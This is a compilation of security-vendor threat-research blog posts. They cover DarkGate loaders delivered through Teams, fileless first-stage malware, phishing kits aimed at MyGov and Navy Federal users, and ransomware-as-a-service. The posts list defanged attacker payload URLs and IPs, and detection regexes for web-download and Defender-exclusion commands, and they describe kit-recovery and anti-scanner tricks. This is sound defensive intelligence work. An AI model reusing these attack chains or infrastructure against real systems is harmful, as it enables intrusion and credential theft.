Our recent findings have shown DarkGate to be delivered through MSFT Teams by means of messaging from an external to internal user in which the message will contain a .zip file that when opened, will direct the user to the senders SharePoint site where the .zip file can be downloaded. The .zip file contains a malicious LNK file that appears to be a PDF document. Once the downloaded file is clicked, the file is executed, and the commands contained utilize cURL to download an execute Autoit3.exe and a script that ends with .au3. Once this script is executed, AutoIT will emplace a new file that contains the shellcode.

Mitigation

To prevent this from happening within Microsoft Teams, we would recommend only allowing Teams chat requests from specific external domains if possible. The use of Safe Attachments or Safe Links that are security features for Teams, are not able to block or detect this threat currently. More information on chat settings can be found at : https://learn.microsoft.com/en-us/microsoftteams/trusted-organizations-external-meetings-chat?tabs=organization-settings

Variant 1:

stage 2 is a pe32 executable: c56b5f0201a3b3de53e561fe76912bfd

stage 3 is ascii text loaded by the exe: 76180a9afe940ee701f557847b60dd14

The above sample is the most common and standard expectation we have observed in recent weeks. The sample uses uncommon request headers to pull down the second and third stage payloads, before the execution chain using Autoit3 begins. Use of http in the cmdline, port 2351 and single letter directories are al in use here. All of these behavioral items provide excellent indicators of compromise (IOC), and can be found at the end of this post.

Variant 2: LNK

This file upon delivery was designed to look like a pdf, and was transported via Teams. If the user had attempted to open the file, it would have executed the shortcut file (.lnk).

In the above screenshot we can see the malicious use of this shortcut file to call PowerShell, and pass in the argument to retrieve a malicious .hta file from the attackers infrastructure. This then led into the typical attack chain utilizing .au3 files with Autoit3.exe. The indicators can be found in the IOCs section below.

Variant 3: VBS

In this example a maldoc was received which called back out and retrieved a darkgate sample. Below is a screenshot of the original sample we received:

Tidied up slightly for readability:

We were unable to retrieve the second stage in this example at the time of analysis, even with dynamic analysis, setting custom user-agents, etc. Again, we see use of http requests from the cmdline, with the port number 2351 being used.

IOCs

Notes:

• Typical use of non-standard user-agents, “a”, “curl”, etc.
• Commonly uses IP addresses directly via http in the cmdline
• We commonly see malware hosted on port 2351, across multiple variants and samples. This may be a default port for this version. Alternatively, single letter directories seem to be another common alternative solution. Look for uncommon user agents reaching out to port 2351, particularly if the source process appears to be cmd, or another scripting interpreter.

URLS:

• hxxp[:]//185.39.18.170/A/S
• hxxp[:]//5.188.87.58:2351/hzuhmgws
• hxxp[:]//5.188.87.58:2351/msihzuhmgws
• hxxp[:]//148.113.1.180:8080/TMDT.hta
• hxxp[:]//fredlomberfile.com:2351/lpfdokkq

IP:

• 185.39.18.170
• 5.188.87.58
• 5.188.87.58
• 148.113.1.180
• 149.248.0.82
• 179.60.149.3
• 185.143.223.64
• 185.8.106.231
• 45.89.65.198
• 5.34.178.21
• 80.66.88.145
• 89.248.193.66

The post DarkGate Malware: Initial Loaders and How to Mitigate Issues appeared first on CyberMaxx.

In this series, we will largely be documenting some of the research we have done into how common criminals are also victimizing the general public, a topic often ignored by the industry.

These posts are meant to be educational and informative. In no way are they commenting on the teams and organizations that were targeted. Everyone is under attack. These threats negatively impact the operations of corporations and government entities as well as the lives of innocent consumers.

The CyberMaxx Offensive security team uncovers these in our routine threat research, not during specific client engagements.

Evasion and Fileless Persistence from First-Stage Malware

Dealing with malware infections at the earliest possible stage is crucial, as they have the potential to cause significant damage and lead to further, more serious compromises. Malware comes in different shapes and sizes, and many families of malicious software follow similar patterns when launching their initial attacks. They often use an initial loader to download secondary and tertiary payloads, which can then carry out various nefarious activities.

One common tactic used by malware is to perform an enumeration of the network surrounding the initial point of intrusion. This means that the malware tries to identify all the devices and services present on the network, which can provide the attacker with valuable information to launch further attacks. The malware may also attempt to establish persistence on the affected system, meaning that it tries to ensure that it remains active even after a system reboot or other measures to remove the infection.

It’s essential to recognize that malware is just a tool used by attackers to achieve their objectives. It’s like an automation of their intentions, allowing them to carry out their attacks on a large scale without being physically present. That’s why it’s critical to address malware infections early on, as they can lead to significant harm and even ransomware attacks, where attackers lock down your system until you pay them a ransom. So always stay vigilant and be proactive in protecting your systems from malware.

This particular infection appears to be the first stage of a larger infection chain which ultimately failed due to the infrastructure hosting further payloads no longer being available.

Technical Analysis

A Spear Phishing campaign to individuals within an organization contains a password-protected attachment, with instructions on how to open it. Opening this archive reveals a .html file, which when opened attempts to impersonate an Office 365 page. This page also instructs the user on how to open the auto-downloaded zip archive ‘objectionablyQuillets.zip’. The email itself was structured in such a way as to appear as though the recipient had already replied to this existing chain, and this was simply another response to a previous conversation.

Extracting the zip archive reveals a Disc Image File by the same name. Analysis of both the zip and img archive reveal an initial defense evasion tactic being employed to bypass Microsoft’s Mark of the Web (MOTW). By using a password-protected zip archive the alternate data stream (ADS) is not updated on receipt, bypassing protections that would normally be put in place.

The image above shows the .zip archive containing a second $DATA stream with a Zone.Identifier value of 3, ie. Marking the file as having been downloaded externally. The unzipped .img file within the same archive does not contain the second stream, bypassing MotW.

Mounting the ‘objectionablyQuillets.img’ file as a browsable directory reveals several sub-directory listings and a large number of junk files designed to lower the entropy of the malware for defense evasion purposes. All directories and files except for the initial ‘tariffedBadgerweedPlying.lnk’ file are marked as hidden, in an attempt to have the user launch the shortcut file triggering the infection chain.

Stage 3: .lnk execution + attempted download

The top-level directory of the mounted archive contains a single viewable file: ‘tariffedBadgerweedPlying.lnk’. Analysis of the shortcut file reveals that it was created in Dec 2021, and its intended purpose is to launch one of three possible next stages. The file is linked to ‘Tanbur.exe’, which is a local copy of the Windows Command Prompt.

The cmd line arguments that follow launch a nested .cmd file as a set of instructions to be executed by ‘Tanbur.exe’.

The nested cmd line arguments employ minor obfuscation to mask the intended purpose. The ultimate goal was to copy legitimate copies of both wscript.exe and reg.exe into the user’s temp directory and mark them as hidden. It then attempts to first launch reg.exe with instructions from a nested file, and then launch a script file via the copied wscript.exe. The latter employing a nested job within the wsf / jscript.

Another form of evasion is employed here by encoding the malicious script in base64 and pushing it into the user’s registry, before calling again at a later stage to decode and execute.

In the image below the base64 script that was nested in the user’s registry is decoded to reveal its objective.

The script file includes several measures to reduce the ability of forensic efforts, mainly in deleting registry keys that were added under the Forestage.qj import, attempting to reflectively load the malware into memory, and adding exclusions to Defender where it is running from, additional persistence mechanisms are also removed here.

We can also see attempts to download a .dll file from an external address into the user temp folder, and load via rundll with N115 operating as the OEP. This is the final successful stage of the sample that was observed, with the attempted download failing due to the infrastructure no longer being live.

IOCs, TTPs, and Detection strategies

Sample SentinelOne STAR Rules:

• ‘Invoke-WebRequest’ + ‘http|http|ftp’ + ‘IP address’.
  CmdLine RegExp “(\bhttps|ftp|http\b)(:\/\/)\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b” and CmdLine In Contains Anycase ( “invoke-webrequest” , “start-bitstransfer” , “system.net.webclient” )
• ‘Add-MpPreference’ (Defender exclusion list)
  CmdLine ContainsCIS “Add-MpPreference”
• ‘Rundll32’ + ‘$env:TEMP’
  CmdLine RegExp “^.*?\brundll32\b.*?\benv:temp\b.*?$”
• ‘xcopy’ + ‘reg.exe’ | ‘wscript.exe’
  CmdLine ContainsCIS “xcopy” AND CmdLine In Contains Anycase (“reg.exe”, “wscript.exe”, “cscript.exe”, “mshta.exe”)

Further Detection Strategies

Iso / Img / zip archives containing lnk files. These typically invoke a process to parse scripts and arguments, eg. Cscript, PowerShell, cmd, etc. Due to administrative usage, this activity may be normal in your environment.

The post Threat Research Series: Evasion and Fileless Persistence from First-Stage Malware appeared first on CyberMaxx.

In order to help foster collective intelligence among the cybersecurity community, CyberMaxx publishes insights and examples of active phishing kits uncovered during our threat research. We believe that by sharing the intelligence available to us with the broader cybersecurity community, organizations can more effectively stay ahead of the ever-evolving threats we all face.

In this series, we will largely be documenting some of the research we have done into how common criminals are also victimizing the general public, a topic often ignored by the industry.

These posts are meant to be educational and informative. In no way are they commenting on the teams and organizations that were targeted. Everyone is under attack. These threats negatively impact the operations of corporations and government entities as well as the lives of innocent consumers.

The CyberMaxx Offensive security team uncovers these in our routine threat research, not during specific client engagements.

Australian MyGov

Recently, a new phishing campaign has been discovered targeting users of the Australian MyGov service. MyGov is a platform that allows Australian citizens to access online government services such as tax and welfare payments. The phishing campaign is designed to trick users into disclosing their personal information, such as login credentials, by directing them to a fake MyGov login page. Cybersecurity experts have warned that this campaign could result in severe data breaches and financial losses for MyGov users. In this context, it is crucial to stay vigilant and take necessary measures to protect personal information from cybercriminals.

Typically, reports on cyber attacks and malicious infrastructure are released after the security community has already taken measures to address the threat, rendering it inactive or “dead”. This time gap between the discovery and reporting of cyber threats is due to the time required for analysis, investigation, and verification of the data gathered. Moreover, it is essential to ensure the accuracy and reliability of the information before sharing it with the public to avoid causing unnecessary panic or false alarms. Additionally, delayed reporting can be beneficial as it allows analysts to collect more information about the attack and better understand its techniques, tactics, and procedures. This knowledge can then be used to prevent similar attacks in the future and improve the overall cybersecurity posture of an organization or community.

Digging In

While looking through logs of reported phishing campaigns, our analysts came across a campaign using a compromised webserver to host a phishing panel targeting Australians who use the MyGov service.

In this example from the wild, this simple phishing scam is intended to collect personal details and login credentials from users of the Australian MyGov service.

The Australian MyGov service is a platform that offers access to a range of government services, including taxes, benefits, and more. Due to the sensitive nature of the information stored in MyGov accounts, such as financial data and personal identification, gaining unauthorized access can be of significant value to cybercriminals and fraudsters. The potential for financial gain and identity theft makes MyGov accounts a prime target for cyber attacks, especially through phishing campaigns that aim to trick users into revealing their login credentials or other personal information.

The consequences of a successful attack on MyGov accounts can be severe, resulting in the loss of personal and financial information, fraudulent transactions, and other detrimental effects. Therefore, it is crucial to take necessary measures to protect MyGov accounts from unauthorized access and stay vigilant against phishing attempts or other cyber threats. Regularly updating passwords, enabling two-factor authentication, and monitoring account activity are some of the recommended practices to safeguard personal information on MyGov and prevent fraudulent activities.

First, let’s look at the “flow” of the scam, from the perspective of a user who clicked on the malicious link they got via SMS or email or whatever.

Scam Flow

The exact steps in a scam flow can vary depending on the type of scam and the specific tactics used by the scammer. However, here are some common steps that may be involved in a scam flow:

1. Contact: The scammer makes contact with the victim, typically through a phone call, email, social media, or other online channels.
2. Establish trust: The scammer may use various tactics to establish trust with the victim, such as posing as a legitimate company or authority figure, using personal information to make the scam seem more convincing, or creating a sense of urgency or fear.
3. Present a fake offer: The scammer presents a fake or fraudulent offer to the victim, such as an investment opportunity, a prize or lottery win, or a request for payment for a fake service.
4. Request payment or personal information: The scammer requests payment or personal information from the victim, typically by asking them to provide credit card information, bank account details, or other sensitive information.
5. Pressure to act quickly: The scammer may pressure the victim to act quickly or make an immediate payment, often by threatening legal action or other consequences if they do not comply.
6. Repeat: If the scam is successful, the scammer may continue to target the victim or sell their personal information to other scammers.

It is important to note that scams can take many different forms, and not all scams will follow this exact sequence. However, by being aware of these common steps, individuals can be better equipped to recognize and avoid potential scams.

How The Scammers Executed the Australian MyGov Phishing Campaign

Firstly, we are asked to log in. Sample credentials are entered in order to start going through the steps the scammers have created for this phishing campaign.

It notifies the users that the credentials are incorrect, forcing them to enter the sample credentials again. This is a surprisingly common pattern in these phishing kits – requesting the user to enter the password twice.

After the second failed attempt to access the account with the sample credentials, the system asks for a one-time password (OTP). We could find no backend mechanism for forwarding on the login information automatically to the “real” MyGov system, and we aren’t knowledgeable about the MyGov OTP system. We aren’t sure if the phisher trying to do a session takeover in real-time by hand – or if this is part of the ruse to seem legit?

Now there is a request for our personal information. This is useful to scammers for actually conducting identity theft like account takeovers/resets.

We are being asked to provide an OTP (One-Time Password) again, similar to the process of entering our password twice. We believe that many kits do this in order to make the ruse seem more legitimate.

Before finally being bounced to the “success” page, and after a few seconds, the real MyGov website.

In summary, this scam is relatively straightforward, but it can result in the theft of sensitive personal information, including login credentials and passwords, to a valuable government service.

Time to Dismantle the Scam

Acquiring a copy of the phishing kit was easy – appending “.zip” to the base directory of the phishing panel works quite often due to how these are deployed.

The scammer gains access to a web hosting account (eg, via buying web-shell access hackers), uploads and unzips the scam package, and they are good to go. They often forget to delete the zip archive, which makes recovering the source code of their scam easy.

Looking at the kits structure, it is quite simple. Some HTML/JS/CSS/Images interact with some PHP scripts. No database, nothing fancy. Just some HTML that sends data to some generic PHP scripts.

The “Email.php” file in the root directory contains the email logs and the email address of the presumable attackers. This file is included by other files.

It also logs to a file – as you can see in this screenshot from one of the other PHP files.

We decided to check if the kit had any victims. We were able to accomplish this by making a request to the hard-coded file in which it keeps its logs.

It had acquired a number of victims – not many, less than 20.

One possibility here for “disruption” activities against this phisher would be to write and execute a simple script to fill the logs with randomly generated information. This would also, due to its email feature, fill the victim’s inbox with junk.

This action was not performed during this investigation for obvious legal reasons.

In Summary

In conclusion, cybersecurity experts have warned about an ongoing phishing campaign targeting users of the Australian MyGov service. The phishing campaign aims to trick users into disclosing their personal information, such as login credentials, by directing them to a fake MyGov login page.

Given the sensitive nature of the information stored in MyGov accounts, such as financial data and personal identification, gaining unauthorized access can be of significant value to cybercriminals and fraudsters. The potential for financial gain and identity theft makes MyGov accounts a prime target for cyber attacks, especially through phishing campaigns that aim to trick users into revealing their login credentials or other personal information.

It is crucial to take necessary measures to protect MyGov accounts from unauthorized access and stay vigilant against phishing attempts or other cyber threats. Regularly updating passwords, enabling two-factor authentication, and monitoring account activity are some of the recommended practices to safeguard personal information on MyGov and prevent fraudulent activities. It is important to be aware of common steps involved in a scam flow and stay alert to potential scams, especially those targeting sensitive information such as MyGov accounts.

Finally, ongoing monitoring of less-targeted attacks, such as the one on the Australian MyGov service, is essential for improving our understanding of cyber threats and preventing similar attacks in the future.

The post Threat Research Series: Investigating a Phishing Campaign Targeting Users of the Australian MyGov Service appeared first on CyberMaxx.

In order to help foster collective intelligence among the cybersecurity community, CyberMaxx publishes insights and examples of active phishing kits uncovered during our threat research. We believe that by sharing the intelligence available to us with the broader cybersecurity community, organizations can more effectively stay ahead of the ever-evolving threats we all face.

In this series, we will largely be documenting some of the research we have done into how common criminals are also victimizing the general public, a topic often ignored by the industry.

These posts are meant to be educational and informative. In no way are they commenting on the teams and organizations that were targeted. Everyone is under attack. These threats negatively impact the operations of corporations and government entities as well as the lives of innocent consumers.

The CyberMaxx Offensive security team uncovers these in our routine threat research, not during specific client engagements.

Investigating a Phishing Campaign Targeting Users of the Navy Federal Credit Union

During one of our campaigns of collecting data on phishing kits, we came across one targeting users of the Navy Federal Credit Union.

Let us walk you through the flow of the scam.

When you click on the malicious link, you get served a rather decent simulacrum of the Navy Federal login page.

Can you tell the difference between these two screenshots?

When you are served the login page, it obviously requests you to log in.

So of course, we log in, twice. It tells us to enter our username and password twice. This is really common in these phishing kits.

We then get asked to enter our email and password – twice.

Now they have our login, password, our email, and our password.

But wait, these crooks want more!

Let’s give them our SSN and some other personal information.

Now, because we are feeling really generous, we give them our credit cards.

And we give them our security questions. Just in case they still are having a hard time defrauding us.

Finally, to allay suspicion after handing over pretty much every piece of PII imaginable, we get redirected to the real Navy Federal homepage.

So, to wrap up the “scam walkthrough” section, this kit steals the following information:

• Usernames for Navy Federal
• Passwords for Navy Federal
• Email Address
• Password
• Address
• Telephone Number
• Social Security Number
• MMN (Military Member Number?)
• Drivers Licence Expiry Date
• Drivers Licence State of Issue
• Credit Card Number
• CVV Number
• Credit Card Expiry Number
• Questions and Answers for Security Questions

That, is quite a lot of data to lose to some stupid PHP script. I’d suggest that is plenty enough for a scammer to do a lot of damage to you.

Now, about those PHP scripts. We managed to recover the “phishing kit” package as a ZIP file from the compromised webserver being used to host the phishing site.

After unpacking the phishing kit, we see it has the below structure.

The files “index.php”, “quest.php”, “quest2.php” and “account.php” all simply display various HTML pages that send POST data to “next.php”. They also all include the “includes/antibot.php” file.

The “css” and “images” directories just contain CSS and images required to display the logos, formatting, etc.

Of the PHP files, the three of interest are “email.php”, “next.php”, and “includes/antibot.php”.

The file “email.php” simply defines an email address for logs to be sent to, and a URL for victims to be redirected to – the legitimate Navy Federal website.

The “next.php” file is kind of interesting, it contains the functions that handle sending the inputted data to the scammers email account.

I don’t know who “VeNzA” is, but they seem to be quite a prolific creator of scampages based on a cheeky Google search.

The “includes/antibot.php” page actually is more interesting. It seems to exist to try prevent web scrapers/scanners ran by people like us from finding the kit. It blocks based on IP addresses and user agents.

For readability reasons, here is a screenshot of the script with most of the “blocked” IP’s and user agents deleted.

Note its use of wildcards/regular expressions in the IP addresses to block entire IP ranges, and it checks for substrings in the user agent header to block user agents it doesn’t like.

Further worth noting is that when it blocks you, it adds your user agent, IP address, and a date stamp to a logfile.

I might even speculate this is a way for the phishers to expand their blocklists – kind of a hostile threat intelligence, where silly whitehats are the threats.

Overall, this kit is pretty tragically simple. For each “page” of information the victim supplies, the scammer gets an email. It is pretty much identical to a few other phishing kits we will be showing here – however this one does have the twist of having a rudimentary “anti-security researcher” protection to avoid being detected by web scanners/scrapers.

A future blog post will cover these “anti-whitehat” mechanisms in greater detail, as we have found several variations on the same theme, and they all are pretty interesting.

Borrowing some ideas from them could even be of value to red teams in avoiding their payloads getting ruined by antivirus companies and such.

The post Threat Research Series: Investigating a Phishing Campaign Targeting Users of the Navy Federal Credit Union appeared first on CyberMaxx.

With a 13% increase from 2021 to 2022 which is equal to the past 5 years’ increases combined, there are no signs that these attacks are going anywhere and organizations and individuals need to be more vigilant than ever before. (Verizon DBIR)

What is RaaS

Extortion or Ransomware as a Service (RaaS) can be thought of as an interpretation of the popular Software as a Service (SaaS) model where users who may not have the time or skill to create and deploy their own ransom will purchase it on the dark web to infect their victims.

The RaaS comes as a kit that is distributed to affiliates and each kit has different features and benefits. Some RaaS kits can include 24/7 support, user reviews, forums, and even offers to bundle services. Prices for a RaaS kit can range significantly from $40 a month to thousands depending on the kit needed. The average ransom demand in 2021 was $6 million.

How Does It Work

The RaaS model follows this outline for operators and affiliates.

RaaS Operators:

• Recruit affiliates on forums and the dark web
• Affiliates gain access to “build their own ransomware package”
• A command and control dashboard is created to track the status of the package
• Victim payment portal is set up
• Victim negotiations assistance
• A dedicated leak site is managed

RaaS Affiliates:

• Pay to use ransomware
• Agrees on the fee per collected ransom
• Targets victims
• Set ransom demands
• Create post-attack user messages
• Compromise the victims
• Execute ransomware
• Communications with victims via chat portals or other channels
• Manage decryption key

4 common RaaS models:

• Monthly subscription for a flat fee
• Affiliate programs, which are the same as a monthly fee model but with a percent of the profits (typically 20-30%)
• going to the ransomware developer
• One-time license fee with no profit sharing
• Pure profit sharing

RaaS is a quick and straightforward way to monetize malware. Through some refined RaaS portals, affiliates can create an account, pay with Bitcoin and start monitoring infection status, and files encrypted, scan their targets, and start making money. Ransomware providers offer a wide range of support options — from online communities, tutorials, documentation, feature updates, and more benefits just like a traditional SaaS product.

Examples

CyberMaxx engineers have noted these RaaS as noteworthy this year so far.

LockBit

LockBit has proven itself to be the world’s most prominent and active ransomware, more than doubling the average ransomware payment by targeting small-to-medium-sized organizations. Dubbed one of the most destructive pieces of software in modern history, LockBit encrypts nearly every file stored on an infected device and drops corresponding ransom notes on victims’ computers.

BlackCat

BlackCat is a notable ransomware family, threatening users worldwide with its unique set of features: possible rebranding of DarkSide, written in Rust (a more secure programming language that offers improved performance and reliable concurrent processing), pays affiliates a comparatively larger share than similar schemes and has launched one of the first public data leaks sites.

Black Basta

Black Basta was only noticed in April 2022 but has become a major player in the RaaS business by using double extortion tactics and attack tools like the QakBot trojan and PrintNightmare exploit.

This ransomware family had multiple successful high-profile attacks back to back:

• American Dental Association
• German-based wind farm operator
• American agricultural equipment manufacturer
• German-based company in construction

Black Basta shows no signs of slowing down. In June 2022 they released a new build to their ransomware stack that is designed to infect VMWare ESXi virtual machines.

Monti

Monti is a relatively new ransomware that is thought to be the same or a rebrand of the Conti ransomware group. Monti encrypts files on Linux systems and possibly now Windows and uses the extension “.puuuk”. Another characteristic of Monti is they operate two separate TOR sites: one for hosting data stolen from victims and another for ransom negotiation.

Currently, the data leak website shows that almost all of the victims have paid their ransoms with the exception of one from Argentina.

Preventing RaaS

In order to help prevent becoming a victim of a RaaS attack, organizations need to develop a robust plan for data security in order to combat the growing trend of ransomware. Since RaaS is so costly to recover from, organizations should consider leveraging solutions designed to detect and prevent threats.

CyberMaxx has identified the following best practices for preventing RaaS:

• Reliable endpoint protections that work in the background 24/7 and can decipher complex algorithms
• Regularly backup systems and devices (a few times a week)
• Validate the backups are working and test the backup/recovery process
• Ensure backups are immutable
• Multiple backups stored in various locations
• Maintain patch programs for vulnerabilities
• Anti-phishing protection
• Train employees and improve security culture

Conclusion

With RaaS being an extremely lucrative business, revenues in 2021 were $20 billion, there is no doubt that we will continue to see it being used more – especially with ransomware attacks rising by 13% that very same year.

There are many things an organization can do to protect against ransomware, but experts recommend being proactive, monitoring continuously, and automating responses to related and enabling attack elements (like phishing). Automation is critical because modern malware attacks move at machine speed and only machines can keep up.

Vulnerability and security incident management solutions can help the security, risk, and IT teams focus by providing playbooks that prioritize and direct action. Data collection, AI, and analytics can make everything less onerous, error-prone, and expensive.

Organizations can use systems to help them anticipate what is most important to their business or mission, optimize processes to minimize exposure, and react quickly when problems arise. This can help businesses avoid potential problems and keep operations running smoothly.

As ransomware attacks continue to grow, it is more important than ever for organizations to have a well-orchestrated IT security infrastructure in place. By doing so, they will be better equipped to weather any malicious attack with less cost and disruption.

The post What is Ransomware as a Service (RaaS)? appeared first on CyberMaxx.

Threat actors continue to get smarter and find ways to cause chaos for organizations, but, it’s not all doom and gloom as the good defenders stay one step ahead with people, processes, and technology to help organizations avoid becoming the victim of a breach.

Russia’s Cyber-attacks on Ukraine

Starting the year off, the world saw the Russian state-sponsored cyber operations deploy DDoS, SMS spam campaigns, wiper malware, air traffic control attacks, and Sandworm malware on Linux systems.

Not stopping there, Russia also utilized phishing emails on Ukrainian military personnel, the Conti ransomware gang, and a two-component malware called FoxBlade for DDoS attacks.

The list continues extensively through the year as the Russian and Ukrainian war has now escalated into a full-on war.

Healthcare is Still a Top Target (And Probably Always Will Be)

The healthcare industry continues to be a top target for cybercriminals with 849 incidents where 571 of those resulting in data exposure (Verizon DBIR 2022 Report).

Healthcare also remains at #1 for the most costly data breaches among all industries reaching $10.10 million this year and expected to grow year over year for the foreseeable future. (IBM cost of a data breach)

The list is extensive for individual organizations that were affected by cyberattacks this year so we will only go over a few in no particular order:

• Eye Care Leaders (ECL) – ECL experienced the largest and most headline-grabbing breach reported this year with approximately 3.6 million patients affected. There was plenty of drama associated with this ransomware attack because of the timing in which the vendor reported the attacks. Several providers filed a lawsuit against the practice management system vendor for “concealing” multiple ransomware attacks and related outages. ECL reported to providers impacted, but not until after the 30-day timeframe required by HIPAA, causing many patient led lawsuits.
• Advocate Aurora Health – In late October, Advocate Aurora reported the disclosure of protected health information to Google and Facebook because of the use of Pixels on their patient portals, website, and applications. The pixels have been removed but not before almost 3 million patients’ IP addresses, insurance information, proxy names, locations, procedure types, and appointment times were leaked. Advocate Aurora is currently defending itself against multiple class action lawsuits in the wake of the Pixel outcome.
• Connexin Software – Pediatric electronic medical records and practice management software vendor, Connexin Software, experienced a network hack and data theft in early December that affected 119 provider offices and some 2.2 million patients. The threat actor gained access to offline patient data used for troubleshooting and removed it from the network. Data stolen includes: names, contact details, SSNs, guarantor names, parent or guardian names, dates of birth, highly specific health insurance information, treatments, procedures, diagnoses, prescriptions, provider names, medical record numbers, and billing and/or claims data.

Additionally, this year saw an increase to 90% of the 10 biggest healthcare breaches that were a result of third-party vendors being infiltrated.

This is on trend with 2021 where vendors were responsible for 60% of the 10 largest healthcare breaches. There is an obvious need for organizations to revisit relationships and contracts with vendors to assess security measures and how these third parties are protecting themselves from potential breaches.

Cyber Insurance Rates Reach New Heights

Cyber insurance is one of the fastest-growing markets and is projected to reach $20 billion by 2025 (Source).

Insurance rates are increasing dramatically as well with one report showing a 24.5% increase in Q1 of 2022 adding onto 2021 Q4’s 74% increase.

The drastic increase in premiums is due to many factors, but the most glaring is the increase in ransomware attacks and the claims made to payout the ransom causing loss ratios for insurance companies.

Cyber insurance underwriters are now more cautious when assessing risk for insureds and will continue to thoroughly review internal security controls and cyber risk procedures.

One positive outcome for the security industry is that insurance providers are requiring that companies either have an in-house MDR solution in place or an outsourced partner to help defend their networks and devices. Without these measures, insurance companies are denying requests for new policies until these steps are taken.

Google Blocks DDoS Attack in June

On June 1st, a Google Cloud Armour customer endured a DDoS attack over HTTPS that peaked at 46 million requests per second (RPS).

This is considered the largest amount of blocked RPS to date being 80% more than the previous record which was 26 million RPS. The attack was 69 minutes and the operations ran according to plan because the customer had already deployed the recommended rule.

Even though the DDoS attack lasted over an hour, the speed at which the requests were sent is impressive. Starting at just 10,000 RPS on the victim’s load balancer, eight minutes later Google Cloud Armour Protection began sending alerts and signals when the load jumped to 100,000 RPS. Two minutes go by and the attack peaked at 46 million RPS and slowly dwindled over the next hour.

Google employees stated that the attackers were not getting the desired outcome and spending more to execute than they were gaining. The malware has not been identified yet but there are signs that point to Mēris botnet that was responsible for other DDoS attacks with close to record RPS.

Google Becomes a Security Player with Mandiant

Although Google Cloud Platform (GCP) was considered to be one of the big three cloud providers, it was in a distant third place after AWS and Microsoft Azure.

Now with the $5.4 billion acquisition of Mandiant, Google looks to become an even bigger player in the security space. GCP looks to combine its already existing security portfolio with Mandiant’s cyber threat intelligence to give it a new more bolstered position for cloud offerings.

Conti Cybercrime Group

The cybercrime group, Conti, attacked Costa Rican healthcare organizations and national businesses with ransomware.

Early in the year on April 15th, the Conti group of cybercriminals deployed its first attack on Costa Rica. The initial attack was on the Ministry of Finance, where the group gained access over a VPN connection using stolen credentials from an installed malware.

From there, a Conti operator gained access to every host on Costa Rica’s interconnected networks, uploaded 672GB of data, and executed ransomware.

The ransom amount was $10 million and came with the threat of attacking the rest of Costa Rica’s ministries if it wasn’t paid.

Costa Rica refused to pay and Conti kept the promise and continued the attacks on the following agencies:

• The Administrative Board of the Electrical Service of the province of Cartago (Jasec)
• The Ministry of Science, Innovation
• Technology and Telecommunications
• The Ministry of Labor and Social Security (MTSS)
• The National Meteorological Institute (IMN)
• Radiographic Costarricense (Racsa)
• The Interuniversity Headquarters of Alajuela
• The Social Development and Family Allowances Fund (FODESAF)
• Costa Rican Social Security Fund (CCSS)

The attacks led to disruptions costing millions of dollars for Costa Rican businesses, healthcare systems, and government agencies.

On May 8th, Costa Rican President declared a national emergency but 11 days later Conti leaders started to disband. The Conti negotiation and news website was down along with chatrooms, servers and proxies began to go offline.

By late June, the data leak site was removed and Conti’s operations were declared dead. The cybercriminal group Conti has since rebranded under several different names but has left its mark, proving that a cyber gang can execute country-wide extortion.

Other Notable Statistics

• Ransomware breaches (outside of healthcare) cost businesses an average of $4.62 million. (Varonis)
• Approximately sixty percent of data breaches are caused by stolen credentials. (Comparitech)
• A breach lifecycle goes undetected for 200 days and takes 77 days to become contained on average
• Nearly half (43%) of all cyber-attacks are specifically targeted at small businesses. (Dataprot)
• Mega breaches (involving $50 million to $65 million records) cost an average of $401 million. This figure is significantly higher than previous estimates and highlights just how costly these types of incidents can be. (Varonis)

The post 2022 in Review…well, most of it, a lot happened appeared first on CyberMaxx.

Cybersecurity analysts have as many tools at their disposal to do their jobs as the number of malware, viruses, and other nasties out there.

We’re going to dive into two forms of analysis for inspecting malware in order to make sure the threat is real or not.

To Be Dynamic, or Not to Be Dynamic…Static

Malware analysis can be separated into two groups: static and dynamic.

• Static malware analysis: examines a malware file without actually running the program. It’s a safer way to analyze malware, as running the code could infect the system. In its most basic form, static analysis gleans information from malware without the need to execute or launch.
• Dynamic malware analysis: is when a malware sample is executed in a test environment to observe its behavior. This can be done with readily available tools such as VMWare, OllyDbg, and more.

What is Static Malware Analysis?

Static malware analysis refers to performing code-based analysis on malware binaries without executing them in a sandbox environment or on real machines.

Static analysis is normally the first step of analysis and can tell an analyst how the malware is designed and maybe what it actually does. Hashing and conducting searches in Virus Total (VT) would be a static analysis. It lets the analyst know what might be needed to conduct dynamic analysis.

It’s also helpful in studying unknown malware or malware whose behavior does not depend on other factors (e.g., user input).

What is Dynamic Malware Analysis?

Dynamic malware analysis can be considered as the process of interacting and activating malicious functionality, often following a specific logic or commands written by the malware’s author.

Dynamic analysis is running the malware in a sandbox while monitoring actions and changes. The analyst will typically run multiple tools to capture network traffic, changes in the registry, or monitor running processes to determine what the intent of the malware is.

Public sandboxes execute the malware and record the actions (dynamic analysis). Unless the malware is programmed to not function under certain conditions, an analyst will typically get to see what it does.

The more complex malware samples will be aware of the environment it is running in and not execute if it believes it is under analysis. This is where reverse engineering comes into play.

Another advantage is that it enables the analyst to uncover novel characteristics of the malicious code without implementing too many false positives. This is particularly important when dealing with more complex pieces of malware that do not have enough information in VT or other public sandboxes out there.

It’s Go Time

Those two forms of analysis are but only two tools or procedures that analysts go about properly identifying potential threats.

To recap: static examines a malware file without actually running the program and dynamic is when a malware sample is executed in a test environment to observe its behavior. Oversimplified, but a quick go-to if short and simple is needed.

Neither is better, just different. Single sides of a coin that make up a whole and are better if used when appropriate, together.

Malware analysis can be a dangerous and complex process to undertake, requiring a great deal of specialized knowledge and skill in order to be successfully carried out.

With tools like this, it helps the good guys win (a lot of the time)…against the bad guys.

The post Dynamic and Static Malware Analysis appeared first on CyberMaxx.

Malware, also known as “malicious software,” typically refers to a malicious file or segment of code delivered to compromise, exploit, or damage a victim system or network.

Malware comes in a variety of types – each designed and created with specific characteristics of how to infiltrate and interact within a target network:

• Ransomware
• Fileless Malware
• Spyware
• Adware
• Trojans
• Worms
• Rootkits
• Keyloggers
• Mobile Malware
• Viruses
• Bots or botnets
• Malvertising

Threat actors may deploy malware to accomplish one or many of the steps within the “Cyber Kill Chain“:

• Recon
• Weaponization
• Delivery
• Exploitation
• Installation
• Command & Control

How is Malware Deployed?

Unfortunately, even the most prepared may fall victim to malware. Cyber criminals, often referred to as cyber threat actors or hackers, have become extremely proficient in developing strategies to entice unsuspecting individuals to access, download, or execute malware.

Common malware delivery methods may include:

• Phishing or Spear-Phishing
• Visiting an infected website or clicking a weaponized link (drive-by download attack)
• Introducing and using unauthorized software or applications (Shadow IT)
